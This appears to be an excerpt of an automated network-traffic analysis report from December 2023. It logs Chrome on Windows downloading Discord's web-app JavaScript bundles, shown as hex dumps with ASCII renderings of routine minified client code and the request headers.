                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 64 61 74 65 43 68 61 74 4f 70 65 6e 28 65 2c 74 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 48 41 4e 4e 45 4c 5f 52 54 43 5f 55 50 44 41 54 45 5f 43 48 41 54 5f 4f 50 45 4e 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 63 68 61 74 4f 70 65 6e 3a 74 7d 29 2c 74 3f 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 73 2e 43 6f 6d 70 6f 6e 65 6e 74 44 69 73 70 61 74 63 68 2e 64 69 73 70 61 74 63 68 28 72 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 46 4f 43 55 53 5f 43 48 41 4e 4e 45 4c 5f 54 45 58 54 5f 41 52 45 41 2c 7b 63 68 61 6e 6e 65 6c 49 64 3a 65 7d 29 7d 2c 30 29 3a 73 2e 43 6f 6d 70 6f 6e 65 6e 74 44 69 73 70 61 74 63 68 2e 64 69 73 70 61 74 63 68 28 72 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73
                                                                          Data Ascii: dateChatOpen(e,t){i.default.dispatch({type:"CHANNEL_RTC_UPDATE_CHAT_OPEN",channelId:e,chatOpen:t}),t?setTimeout(()=>{s.ComponentDispatch.dispatch(r.ComponentActions.FOCUS_CHANNEL_TEXT_AREA,{channelId:e})},0):s.ComponentDispatch.dispatch(r.ComponentActions
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 45 6e 64 70 6f 69 6e 74 73 2e 43 4f 4e 4e 45 43 54 49 4f 4e 53 5f 41 55 54 48 4f 52 49 5a 45 28 65 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 74 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 7d 2c 63 61 6c 6c 62 61 63 6b 3a 45 2c 63 6f 6e 6e 65 63 74 28 65 2c 74 2c 6e 2c 61 2c 6c 29 7b 76 61 72 20 73 3b 72 65 74 75 72 6e 20 64 2e 64 65 66 61 75 6c 74 2e 70 75 74 28 7b 75 72 6c 3a 63 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 4f 4e 4e 45 43 54 49 4f 4e 28 65 2c 74 29 2c 62 6f 64 79 3a 7b 6e 61 6d 65 3a 6e 2c 66 72 69 65 6e 64 5f 73 79 6e 63 3a 6e 75 6c 6c 21 3d 3d 28 73 3d 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 66 72 69 65 6e 64 5f 73 79 6e 63 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 63 2e 46 52 49 45 4e 44 5f 53
                                                                          Data Ascii: Endpoints.CONNECTIONS_AUTHORIZE(e),l.default.get({url:t,oldFormErrors:!0})},callback:E,connect(e,t,n,a,l){var s;return d.default.put({url:c.Endpoints.CONNECTION(e,t),body:{name:n,friend_sync:null!==(s=null==l?void 0:l.friend_sync)&&void 0!==s?s:c.FRIEND_S


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          267192.168.2.550002162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/89894.44f49c0018afb3694fe7.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
                                                                          2023-12-10 16:45:13 UTC975INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 35 37 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 65 30 63 30 39 36 64 63 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 13574Connection: closeCF-Ray: 8336f4fe0c096dc1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC394INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 39 38 39 34 22 5d 2c 7b 37 39 31 31 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 6f 3d 6e 28 22 39 35 34 31 30 22 29 2c 69 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 75 3d 6e 28 22 32 31 31 38 39 35 22 29 2c 72 3d 6e 28 22 32 36 30 39 32 22 29 2c 73 3d 6e 28 22 35 39 39 31 31 30 22 29 2c 61 3d 6e 28 22 33 31 35
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["89894"],{79112:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return _}});var l=n("872717"),o=n("95410"),i=n("913144"),u=n("211895"),r=n("26092"),s=n("599110"),a=n("315
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 6e 75 6c 6c 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 6f 70 65 6e 57 69 74 68 6f 75 74 42 61 63 6b 73 74 61 63 6b 3a 21 31 7d 3b 28 30 2c 75 2e 64 65 66 61 75 6c 74 29 28 65 2c 74 2c 6e 29 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 6e 75 6c 6c 2c 6e 3d 61 72 67 75 6d
                                                                          Data Ascii: arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{openWithoutBackstack:!1};(0,u.default)(e,t,n)},init:function(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=argum
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 3a 6e 2c 65 6d 61 69 6c 3a 75 2c 65 6d 61 69 6c 5f 74 6f 6b 65 6e 3a 72 2c 70 61 73 73 77 6f 72 64 3a 5f 2c 61 76 61 74 61 72 3a 54 2c 6e 65 77 5f 70 61 73 73 77 6f 72 64 3a 70 2c 2e 2e 2e 65 2c 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 3a 6e 75 6c 6c 21 3d 66 26 26 22 22 21 3d 3d 66 3f 66 3a 76 6f 69 64 20 30 7d 2c 69 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 63 2e 44 45 56 49 43 45 5f 54 4f 4b 45 4e 29 2c 73 3d 28 30 2c 53 2e 67 65 74 44 65 76 69 63 65 50 75 73 68 50 72 6f 76 69 64 65 72 29 28 29 3b 6e 75 6c 6c 21 3d 73 26 26 6e 75 6c 6c 21 3d 69 26 26 28 74 2e 70 75 73 68 5f 70 72 6f 76 69 64 65 72 3d 73 2c 74 2e 70 75 73 68 5f 74 6f 6b 65 6e 3d 69 29 3b 6c 65 74 20 61 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 63 2e 44 45 56 49 43 45 5f 56 4f 49
                                                                          Data Ascii: e:n,email:u,email_token:r,password:_,avatar:T,new_password:p,...e,discriminator:null!=f&&""!==f?f:void 0},i=o.default.get(c.DEVICE_TOKEN),s=(0,S.getDevicePushProvider)();null!=s&&null!=i&&(t.push_provider=s,t.push_token=i);let a=o.default.get(c.DEVICE_VOI
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 63 6f 6c 6f 72 3a 75 3d 6f 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 72 3d 22 22 2c 2e 2e 2e 73 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 73 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6e 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 3f 75 3a 75 2e 63 73 73 2c 66
                                                                          Data Ascii: color:u=o.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...s}=e;return(0,l.jsx)("svg",{...(0,i.default)(s),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:(0,l.jsx)("path",{fill:"string"==typeof u?u:u.css,f
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6f 72 43 6f 61 63 68 6d 61 72 6b 28 29 7b 72 65 74 75 72 6e 20 73 2e 65 6d 6f 6a 69 52 65 61 63 74 69 6f 6e 46 6f 72 43 6f 61 63 68 6d 61 72 6b 7d 67 65 74 42 75 72 73 74 65 64 50 72 65 76 69 65 77 44 61 74 61 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 73 2e 67 75 69 6c 64 42 75 72 73 74 50 72 65 76 69 65 77 73 5b 65 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 76 6f 69 64 20 30 7d 67 65 74 53 74 61 74 65 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 42 75 72 73 74 52 65 61 63 74 69 6f 6e 53 74 6f 72 65 22 2c 61 2e 70 65 72 73 69 73 74 4b 65 79 3d 22 42 75 72 73 74 52 65 61 63 74 69 6f 6e 53 74 6f 72 65 33 33 22 3b 76 61 72 20 64 3d 6e 65 77 20 61 28 69 2e 64 65 66 61 75 6c
                                                                          Data Ascii: orCoachmark(){return s.emojiReactionForCoachmark}getBurstedPreviewData(e){var t;return null!==(t=s.guildBurstPreviews[e])&&void 0!==t?t:void 0}getState(){return s}}a.displayName="BurstReactionStore",a.persistKey="BurstReactionStore33";var d=new a(i.defaul
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 77 20 53 65 74 2c 49 3d 28 29 3d 3e 4e 2e 65 6d 69 74 43 68 61 6e 67 65 28 29 2c 55 3d 75 2e 64 65 62 6f 75 6e 63 65 28 49 2c 31 35 30 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 6c 65 74 20 74 3d 66 5b 65 5d 3b 6e 75 6c 6c 21 3d 74 26 26 21 74 2e 63 6c 6f 73 65 64 26 26 28 54 5b 65 5d 3d 7b 78 3a 74 2e 73 63 72 65 65 6e 58 2c 79 3a 74 2e 73 63 72 65 65 6e 59 2c 77 69 64 74 68 3a 74 2e 69 6e 6e 65 72 57 69 64 74 68 2c 68 65 69 67 68 74 3a 74 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 61 6c 77 61 79 73 4f 6e 54 6f 70 3a 21 21 63 2e 69 73 50 6c 61 74 66 6f 72 6d 45 6d 62 65 64 64 65 64 26 26 70 5b 65 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 6c 65 74 20 74 3d 66 5b 65 5d 3b 6e 75 6c 6c 21 3d 74 26 26 28 21 74 2e 63 6c 6f 73 65 64 26 26 76 28
                                                                          Data Ascii: ew Set,I=()=>N.emitChange(),U=u.debounce(I,150);function v(e){let t=f[e];null!=t&&!t.closed&&(T[e]={x:t.screenX,y:t.screenY,width:t.innerWidth,height:t.innerHeight,alwaysOnTop:!!c.isPlatformEmbedded&&p[e]})}function P(e){let t=f[e];null!=t&&(!t.closed&&v(
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 79 2c 6f 28 6e 75 6c 6c 21 3d 6e 2e 68 65 61 64 2c 22 44 6f 63 75 6d 65 6e 74 20 68 65 61 64 20 77 61 73 20 6e 75 6c 6c 22 29 2c 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 7d 28 30 2c 74 29 3b 6c 65 74 20 69 3d 28 30 2c 72 2e 63 72 65 61 74 65 52 6f 6f 74 29 28 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 70 70 2d 6d 6f 75 6e 74 22 29 29 3b 6f 28 6e 75 6c 6c 21 3d 69 2c 22 4e 6f 20 72 65 6e 64 65 72 20 74 61 72 67 65 74 20 66 6f 72 20 70 6f 70 6f 75 74 21 22 29 2c 68 5b 65 5d 3d 69 2c 69 2e 72 65 6e 64 65 72 28 6e 28 65 29 29 7d 28 6c 29 2c 52 2e 64 65 6c 65 74 65 28 6c 29 2c 4e 2e 65 6d 69 74 43 68 61 6e 67 65 28 29 29 29 3b 63 61 73 65 20 5f 2e 50 6f 70 6f 75 74 45 76 65 6e 74 54 79 70 65 73 2e 55 4e 4c 4f 41 44 45
                                                                          Data Ascii: ty,o(null!=n.head,"Document head was null"),n.head.appendChild(t)}}(0,t);let i=(0,r.createRoot)(l.getElementById("app-mount"));o(null!=i,"No render target for popout!"),h[e]=i,i.render(n(e))}(l),R.delete(l),N.emitChange()));case _.PopoutEventTypes.UNLOADE
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 74 7b 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 74 2c 78 3a 6e 2c 79 3a 6c 2c 61 6c 77 61 79 73 4f 6e 54 6f 70 3a 6f 7d 3d 45 3b 64 3d 6e 75 6c 6c 21 3d 6f 3f 6f 3a 72 2c 61 3d 7b 77 69 64 74 68 3a 6e 75 6c 6c 21 3d 65 26 26 30 21 3d 3d 65 3f 65 3a 69 2c 68 65 69 67 68 74 3a 6e 75 6c 6c 21 3d 74 26 26 30 21 3d 3d 74 3f 74 3a 75 2c 6c 65 66 74 3a 6e 2c 74 6f 70 3a 6c 2c 2e 2e 2e 61 7d 7d 6c 65 74 20 68 3d 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 5f 2e 52 6f 75 74 65 73 2e 50 4f 50 4f 55 54 5f 57 49 4e 44 4f 57 2c 74 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 22 22 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 29 7b 6c 65 74 20 6c 3d 65 5b 6e 5d 3b 76 6f 69 64 20 30 21 3d 3d 6c 26 26 28 22 62 6f 6f 6c 65
                                                                          Data Ascii: et{width:e,height:t,x:n,y:l,alwaysOnTop:o}=E;d=null!=o?o:r,a={width:null!=e&&0!==e?e:i,height:null!=t&&0!==t?t:u,left:n,top:l,...a}}let h=window.open(_.Routes.POPOUT_WINDOW,t,function(e){let t="";for(let n of Object.keys(e)){let l=e[n];void 0!==l&&("boole
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 6e 75 6c 6c 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 6f 70 65 6e 57 69 74 68 6f 75 74 42 61 63 6b 73 74 61 63 6b 3a 21 31 7d 3b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 4d 4f 44 41 4c 5f 4f 50 45 4e 22 2c 73 65 63 74 69 6f 6e 3a 65 2c 73 75 62 73 65 63 74 69 6f 6e 3a 74 2c 2e 2e 2e 6e 7d 29 2c 28 30 2c 6f 2e 70 75 73 68 4c 61 79 65 72 29 28 69 2e 4c 61 79 65 72 73 2e 55 53 45 52 5f 53 45 54 54 49 4e 47 53 29 7d 7d 2c 32 36 30 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74
                                                                          Data Ascii: ?arguments[1]:null,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{openWithoutBackstack:!1};l.default.dispatch({type:"USER_SETTINGS_MODAL_OPEN",section:e,subsection:t,...n}),(0,o.pushLayer)(i.Layers.USER_SETTINGS)}},26092:function(e,t,n){"use st


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          268192.168.2.550003162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC865OUTGET /assets/8240.865c70ef34cec1e11192.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
                                                                          2023-12-10 16:45:13 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 39 36 34 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 65 63 38 38 62 32 31 63 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 69647Connection: closeCF-Ray: 8336f4fec88b21ca-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC245INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 32 34 30 22 5d 2c 7b 32 39 35 34 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 61 3d 7b 63 6c 65 61 72 44 72 61 66 74 28 65 2c 74 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 44 52 41 46 54 5f 43 4c 45 41 52 22 2c 63 68 61 6e 6e 65 6c 49
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["8240"],{295426:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return a}});var i=n("913144"),a={clearDraft(e,t){i.default.dispatch({type:"DRAFT_CLEAR",channelI
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 64 3a 65 2c 64 72 61 66 74 54 79 70 65 3a 74 7d 29 7d 2c 73 61 76 65 44 72 61 66 74 28 65 2c 74 2c 6e 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 44 52 41 46 54 5f 53 41 56 45 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 64 72 61 66 74 3a 74 2c 64 72 61 66 74 54 79 70 65 3a 6e 7d 29 7d 2c 63 68 61 6e 67 65 44 72 61 66 74 28 65 2c 74 2c 6e 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 44 52 41 46 54 5f 43 48 41 4e 47 45 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 64 72 61 66 74 3a 74 2c 64 72 61 66 74 54 79 70 65 3a 6e 7d 29 7d 2c 63 68 61 6e 67 65 54 68 72 65 61 64 53 65 74 74 69 6e 67 73 28 65 2c 74 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22
                                                                          Data Ascii: d:e,draftType:t})},saveDraft(e,t,n){i.default.dispatch({type:"DRAFT_SAVE",channelId:e,draft:t,draftType:n})},changeDraft(e,t,n){i.default.dispatch({type:"DRAFT_CHANGE",channelId:e,draft:t,draftType:n})},changeThreadSettings(e,t){i.default.dispatch({type:"
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 6c 65 74 65 20 74 68 69 73 2e 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 5b 65 5d 7d 73 75 62 73 63 72 69 62 65 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 69 3d 74 68 69 73 2e 5f 67 65 74 28 65 29 3b 72 65 74 75 72 6e 21 6c 2e 69 73 45 71 75 61 6c 28 69 2e 67 65 74 28 74 29 2c 6e 29 26 26 28 69 2e 73 65 74 28 74 2c 6e 29 2c 74 68 69 73 2e 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 5b 65 5d 3d 69 2c 74 68 69 73 2e 5f 6f 6e 43 68 61 6e 67 65 28 65 2c 6f 28 69 29 29 2c 21 30 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 3d 7b 7d 2c 74 68 69 73 2e 5f 6f 6e 43 68 61 6e 67 65 3d 65 7d 7d 7d 2c 36 32 33 30 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e
                                                                          Data Ascii: elete this._subscriptions[e]}subscribe(e,t,n){let i=this._get(e);return!l.isEqual(i.get(t),n)&&(i.set(t,n),this._subscriptions[e]=i,this._onChange(e,o(i)),!0)}constructor(e){this._subscriptions={},this._onChange=e}}},623053:function(e,t,n){"use strict";n.
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 66 61 75 6c 74 29 28 22 47 75 69 6c 64 4d 65 6d 62 65 72 53 75 62 73 63 72 69 70 74 69 6f 6e 73 22 29 2e 77 61 72 6e 28 22 47 75 69 6c 64 4d 65 6d 62 65 72 53 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 73 75 62 73 63 72 69 62 65 28 2e 2e 2e 29 3a 20 50 6f 74 65 6e 74 69 61 6c 20 72 65 66 65 72 65 6e 63 65 20 6c 65 61 6b 21 20 28 22 2e 63 6f 6e 63 61 74 28 64 2c 22 20 73 75 62 73 63 72 69 70 74 69 6f 6e 73 29 22 29 29 7d 66 6c 75 73 68 55 6e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 28 29 7b 21 6c 2e 69 73 45 6d 70 74 79 28 74 68 69 73 2e 5f 75 6e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 29 26 26 28 6c 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 5f 75 6e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2c 28 65 2c 74 29 3d 3e 7b 6c 65 74 20 6e 3d 74 68 69 73 2e 5f 73 75 62 73
                                                                          Data Ascii: fault)("GuildMemberSubscriptions").warn("GuildMemberSubscriptions.subscribe(...): Potential reference leak! (".concat(d," subscriptions)"))}flushUnsubscriptions(){!l.isEmpty(this._unsubscriptions)&&(l.forEach(this._unsubscriptions,(e,t)=>{let n=this._subs
